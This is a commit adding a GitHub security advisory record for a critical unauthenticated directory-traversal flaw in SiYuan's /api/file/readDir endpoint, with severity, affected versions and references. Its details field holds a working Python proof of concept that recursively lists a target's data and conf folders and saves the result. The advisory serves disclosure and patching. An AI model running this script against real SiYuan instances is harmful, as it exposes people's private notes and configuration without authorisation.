Publish GHSA-xmw9-6r43-x9ww

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-xmw9-6r43-x9ww/GHSA-xmw9-6r43-x9ww.json

@@ -0,0 +1,57 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-xmw9-6r43-x9ww",
+  "modified": "2026-03-25T19:38:01Z",
+  "published": "2026-03-25T19:38:01Z",
+  "aliases": [
+    "CVE-2026-33670"
+  ],
+  "summary": "SiYuan has directory traversal within its publishing service",
+  "details": "### Details\n\nThe /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"POC: SiYuan /api/file/readDir 未鉴权目录遍历\"\"\"\nimport requests, json, sys\n\ndef poc(target):\n    base = target.rstrip(\"/\")\n    url = f\"{base}/api/file/readDir\"\n\n    def read_dir(path, depth=0, max_depth=4):\n        try:\n            r = requests.post(url, json={\"path\":path},\n                            headers={\"Content-Type\":\"application/json\"}, timeout=10)\n            data = r.json()\n        except Exception as e:\n            return\n        if data.get(\"code\") != 0:\n            return\n\n        entries = data.get(\"data\") or []\n        for entry in entries:\n            name = entry.get(\"name\",\"\")\n            if name.startswith(\".\"):\n                continue\n            icon = \"📁\" if entry.get(\"isDir\") else \"📄\"\n            indent = \"  \" * depth\n            print(f\"  {indent}{icon} {name}\")\n\n            if entry.get(\"isDir\") and depth < max_depth:\n                read_dir(f\"{path}/{name}\", depth+1, max_depth)\n\n    # 遍历根目录\n    print(\"[+] 漏洞存在！开始遍历\\n\")\n    print(\"  📂 data/\")\n    read_dir(\"data\", max_depth=2)\n\n    print(\"\\n  📂 conf/\")\n    read_dir(\"conf\", max_depth=2)\n\n    # 保存\n    try:\n        r = requests.post(url, json={\"path\":\"data\"},\n                        headers={\"Content-Type\":\"application/json\"}, timeout=10)\n        with open(\"readdir.json\",\"w\",encoding=\"utf-8\") as f:\n            json.dump(r.json(), f, ensure_ascii=False, indent=2)\n        print(f\"\\n[+] 根目录数据已保存: readdir.json\")\n    except: pass\n\nif __name__ == \"__main__\":\n    poc(sys.argv[1] if len(sys.argv)>1 else \"http://172.18.40.184\")\n```\n\n### Impact\n\nDirectory traversal vulnerability: The entire directory structure of a notebook could be obtained, and then a file reading vulnerability could be exploited to achieve arbitrary document reading.\n\n资源文件夹\n\n<img width=\"943\" height=\"794\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c97fcc42-183e-4c83-8a27-cf99bf805038\" />\n\n插件文件夹\n\n<img width=\"826\" height=\"921\" alt=\"image\" src=\"https://github.com/user-attachments/assets/925d4512-e4c0-4b3b-bf96-5639ec572705\" />\n\nconf文件夹\n\n<img width=\"730\" height=\"834\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2a0c23b9-2d87-4421-977d-687f47726741\" />",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/siyuan-note/siyuan/kernel"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "0.0.0-20260317012524-fe4523fff2c8"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-xmw9-6r43-x9ww"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/siyuan-note/siyuan"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "CRITICAL",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-25T19:38:01Z",
+    "nvd_published_at": null
+  }
+}